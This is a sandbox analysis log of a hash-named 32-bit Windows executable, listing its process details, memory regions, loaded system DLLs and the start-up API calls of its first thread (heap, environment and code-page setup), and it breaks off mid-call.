# Flog Txt Version 1 # Analyzer Version: 4.3.0 # Analyzer Build Date: Sep 20 2021 05:59:55 # Log Creation Date: 27.09.2021 17:30:11.252 Process: id = "1" image_name = "d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe" page_root = "0x4958d000" os_pid = "0xb70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x640" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 118 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 119 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 120 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 121 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 122 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 123 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 124 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 125 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 126 start_va = 0x400000 end_va = 0x4a6fff monitored = 1 entry_point = 0x401b2c region_type = mapped_file name = "d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe") Region: id = 127 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 128 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 129 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 130 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 131 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 132 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 270 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 271 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 272 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 273 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 274 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 275 start_va = 0x550000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 276 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 277 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 278 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 279 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 280 start_va = 0x550000 end_va = 0x60dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 281 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 282 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 283 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 284 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 285 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 286 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 287 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 288 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 289 start_va = 0x4b0000 end_va = 0x4d9fff monitored = 0 entry_point = 0x4b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 290 start_va = 0x8c0000 end_va = 0xa47fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 291 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 292 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 293 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 294 start_va = 0xa50000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 295 start_va = 0xbe0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 296 start_va = 0x610000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 297 start_va = 0x1fe0000 end_va = 0x27dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fe0000" filename = "" Region: id = 298 start_va = 0x4c0000 end_va = 0x4c2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 299 start_va = 0x4c0000 end_va = 0x4c2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 300 start_va = 0x4c0000 end_va = 0x4c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 301 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 302 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 303 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 304 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 305 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 306 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 307 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 308 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 309 start_va = 0x4d0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 310 start_va = 0x1fe0000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 311 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 312 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 313 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 314 start_va = 0x1fe0000 end_va = 0x209bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fe0000" filename = "" Region: id = 315 start_va = 0x21c0000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 316 start_va = 0x4d0000 end_va = 0x4d3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 317 start_va = 0x701d0000 end_va = 0x701ecfff monitored = 0 entry_point = 0x701d3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 318 start_va = 0x4f0000 end_va = 0x4f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 334 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Thread: id = 1 os_tid = 0x2fc [0068.478] GetStartupInfoA (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0068.478] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x690000 [0068.540] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0068.540] GetProcAddress (hModule=0x74650000, lpProcName="FlsAlloc") returned 0x7466a980 [0068.540] GetProcAddress (hModule=0x74650000, lpProcName="FlsGetValue") returned 0x74667570 [0068.540] GetProcAddress (hModule=0x74650000, lpProcName="FlsSetValue") returned 0x74669e30 [0068.540] GetProcAddress (hModule=0x74650000, lpProcName="FlsFree") returned 0x74674ff0 [0068.541] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0068.541] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0068.541] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0068.541] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0068.541] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0068.541] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0068.542] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0068.542] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0068.542] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0068.542] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0068.542] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0068.542] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0068.542] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0068.542] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0068.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0068.551] GetProcAddress (hModule=0x74650000, lpProcName="DecodePointer") returned 0x7794d830 [0068.551] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x214) returned 0x6905a8 [0068.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0068.551] GetProcAddress (hModule=0x74650000, lpProcName="DecodePointer") returned 0x7794d830 [0068.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0068.551] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0068.551] GetProcAddress (hModule=0x74650000, lpProcName="DecodePointer") returned 0x7794d830 [0068.552] GetCurrentThreadId () returned 0x2fc [0068.552] GetStartupInfoA (in: lpStartupInfo=0x19fe9c | out: lpStartupInfo=0x19fe9c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0068.552] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x800) returned 0x6907c8 [0068.552] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0068.552] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0068.552] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0068.552] SetHandleCount (uNumber=0x20) returned 0x20 [0068.552] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe\" " [0068.552] GetEnvironmentStringsW () returned 0x6cfd20* [0068.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1293, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1293 [0068.552] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x50d) returned 0x690fd0 [0068.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1293, lpMultiByteStr=0x690fd0, cbMultiByte=1293, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1293 [0068.553] FreeEnvironmentStringsW (penv=0x6cfd20) returned 1 [0068.553] GetLastError () returned 0x0 [0068.553] SetLastError (dwErrCode=0x0) [0068.553] GetLastError () returned 0x0 [0068.553] SetLastError (dwErrCode=0x0) [0068.553] GetLastError () returned 0x0 [0068.553] SetLastError (dwErrCode=0x0) [0068.553] GetACP () returned 0x4e4 [0068.553] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x220) returned 0x6914e8 [0068.553] GetLastError () returned 0x0 [0068.553] SetLastError (dwErrCode=0x0) [0068.553] IsValidCodePage (CodePage=0x4e4) returned 1 [0068.553] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0068.553] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0068.553] GetLastError () returned 0x0 [0068.553] SetLastError (dwErrCode=0x0) [0068.553] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x19f8d8 | out: lpCharType=0x19f8d8) returned 1 [0068.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0068.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ艱@Ā") returned 256 [0068.554] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ艱@Ā", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0068.554] GetLastError () returned 0x0 [0068.554] SetLastError (dwErrCode=0x0) [0068.554] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0068.603] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0068.603] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0068.603] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0068.603] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0068.603] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ]#hö\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0068.603] GetLastError () returned 0x0 [0068.603] SetLastError (dwErrCode=0x0) [0068.603] MultiByteToWideChar 